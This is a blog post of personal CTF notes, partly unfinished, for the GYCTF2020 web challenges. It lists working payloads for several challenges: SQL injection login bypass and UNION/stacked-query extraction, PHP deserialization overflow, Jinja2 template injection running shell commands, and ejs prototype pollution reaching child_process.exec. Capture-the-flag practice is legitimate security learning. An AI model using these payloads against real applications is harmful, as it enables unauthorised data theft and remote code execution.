CTF笔记(一)——i春秋2020新春公益赛【未完】

前言

本来是不打算写CTF的,但是发现自己总是记不住,没办法了

简单的招聘系统

知识点:万能钥匙

靶机:

Payload:
登录:

lname=%27%3D0--+&lpass=

查询:

' union select 1,database(),3,4,5;#
' union select 1,count(table_name),3,4,5 from information_schema.tables where table_schema='nzhaopin';#
' union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='flag' and table_schema='nzhaopin';#
' union select 1,flaaag,3,4,5 from flag;#

babyPHP

知识点:php反序列化溢出

靶机:http://server.icystal.top/index.php

参考链接:https://www.cnblogs.com/wangtanzhi/p/11908422.html

Payload:

payload = ';s:8:nickname;O:4:User:2:{s:3:age;s:76:select 1,c4ca4238a0b923820dcc509a6f75849b from user where username=admin;s:8:nickname;O:4:Info:3:{s:3:age;s:1:1;s:8:nickname;s:1:2;s:8:CtrlCase;O:6:dbCtrl:2:{s:8:password;s:1:1;s:4:name;s:5:admin;}}}s:8:CtrlCase;N;}'
payload = 'age='+'alter'*len(payload)+payload

sqlicopy

知识点:据说是宽字节注入+堆叠

靶机:http://server.icystal.top/sqlicopy.php

参考链接:https://blog.csdn.net/qq_40648358/article/details/104456748

Payload:不会

Blacklist

知识点:sql Handler

靶机:https://buuoj.cn/challenges#[GYCTF2020]Blacklist

参考链接:https://www.cnblogs.com/chrysanthemum/p/11657008.html https://blog.csdn.net/qq_26406447/article/details/90643951 https://blog.csdn.net/weixin_40871137/article/details/94349532

Payload:

?inject=';show tables;show columns from FlagHere;handler FlagHere open as h;handler h read first;--

Ezsqli

知识点:无需in的SQL盲注

靶机:https://buuoj.cn/challenges#[GYCTF2020]Ezsqli

参考链接:https://nosec.org/home/detail/3830.html https://www.smi1e.top/新春战疫公益赛-ezsqli-出题小记/

Payload:没做出来

FlaskAPP

知识点:jinjia2 模板注入 ssti

靶机:

参考链接:https://zhuanlan.zhihu.com/p/93746437

Payload:

{{().__class__.__bases__[0].__subclasses__()[78].__init__.__globals__['__builtins__']['ev'+'al']('__im'+'port__(o'+'s).po'+'pen(cat this_is_the_fl'+'ag.txt)').read()}}

Ez_Express

知识点:上车 js原型链污染+字母大小写的骚操作+ejs模板的源码

靶机:https://buuoj.cn/challenges#[GYCTF2020]Ez_Express
参考链接:https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html

https://www.cnblogs.com/-hack-/p/12076609.html

https://xz.aliyun.com/t/6113

https://buuoj.cn/challenges#[XNUCA2019Qualifier]HardJS

https://github.com/mde/ejs/search?q=outputFunctionName&unscoped_q=outputFunctionName

Payload:

注册登录:

username=admın

action:

Content-Type: application/json
{__proto__:{outputFunctionName:a;global.process.mainModule.require('child_process').exec('cat /flag > /app/public/flag\');//}}

node game

知识点:nodejs http.get ssrf

靶机:https://buuoj.cn/challenges#[GYCTF2020]Node%20Game

参考链接:https://xz.aliyun.com/t/2894 http://blog.5am3.com/2020/02/11/ctf-node1/

Payload:不会,贴一下群里大佬的待日后研究

彩蛋∑(っ°Д°;)っ

标签:, , , , , , , , , ,

不说点什么喵?

2 + 17 =

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据